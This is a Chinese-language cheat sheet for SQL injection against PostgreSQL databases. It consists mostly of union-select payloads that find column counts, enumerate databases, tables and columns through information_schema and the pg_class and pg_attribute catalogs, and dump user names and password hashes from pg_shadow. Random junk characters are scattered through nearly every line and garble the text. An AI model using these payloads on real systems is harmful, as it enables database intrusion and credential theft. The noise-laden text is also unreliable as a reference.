结合了MSSQL MySQL Oracle的一些特点: g, h7 ~, ?- F$ g
支持多语句执行,语句可以没有from postgres用户是超级用户(创始人账户) 只有superuser有copy权限 注释: — , /**/9 F& C: L* K1 z# X
连接符: %20 , + , /**/ 内置函数:, f: D7 }' d5 i2 ?
current_database() //当前数据库名
$ h) K) ]. K! i5 f' M+ q3 Hsession_user //会话用户
* N# y/ I* }2 d9 Zcurrent_user //当前数据库用户' C. C3 u1 J% r _
user //当前用户1 C# y, d7 P. q2 Z
version() //数据库版本 Union注射:
& X+ l g: L1 Q/ jorder by n–8 `, W8 ^, \' O& F% w2 N
and 1=2 union select null,null,null–% u3 r' S4 m/ B. @' C: D
and 1=2 union select ‘beach’,null,null–
K: ^# s. F' Q- u6 J+ Kand 1=2 union select (select version()),null,null– 获取表名,字段名(新版本利用information_schema):$ P9 c* W' q3 B8 h9 Z% K' o; @& @
group_concat(table_name) I7 x% O9 u9 H) I* j) q( h: D
and 1=2 union select table_name,null,null from information_schema.tables limit 1 offset n–
p: [$ h, W9 d+ Vand 1=2 union select column_name,null,null from information_schema.columns where table_name=’admin’ limit 1 offset n–( b% P" ?2 y- m. v. W- W# U
(老版本)
+ b, c' x- ~* fpg_class.oid对应pg_attribute.attrelid9 _7 ^2 R4 H! b8 v5 G& i* l$ Q( e- b
pg_class.relname表名
* I5 M: b3 d" R$ ?7 z& bpg_attribute.attname字段名 select relname from pg_class获取表名
$ p' `& t( ~/ Z3 O8 bselect oid from pg_class where 条件 获取参数
# B0 A# x4 {! O/ R, Wselect attname from pg_attribute where attrelid=’oid的值’ 获取字段名 实战:. h3 o) r* q" _ j3 @/ b- R
and 1=2 union select relname,null,null from pg_class where relkind=’r’ limit 1 offset 0–加入relkind=’r'只查询普通表8 h% h4 J" }* s* v' j4 t; p
and 1=2 union select cast(oid as varchar(10)),null,null from pg_class where relkind=’r’ limit 1 offset 0–
3 k( X' J4 \1 I由于oid类型是oid,要数据类型兼容我们用cast函数强制转换成varchar类型。比如得到1136 and 1=2 union select attname,null,null from pg_attribute where attrelid=1136 limit 1 offset 0–爆表名" {# W( `1 B+ Z8 t
======================================================================
8 Y2 U- K# W) M6 ^" K8 m- Z( {and 1=2 union select datname,null,null from pg_database limit 1 offset 0–爆库3 u/ [7 s; D5 r4 u8 v9 x4 @
and 1=2 union select username||chr(124)||passwd,null,null from pg_shadow limit 1 offset 0–爆数据库用户密码 |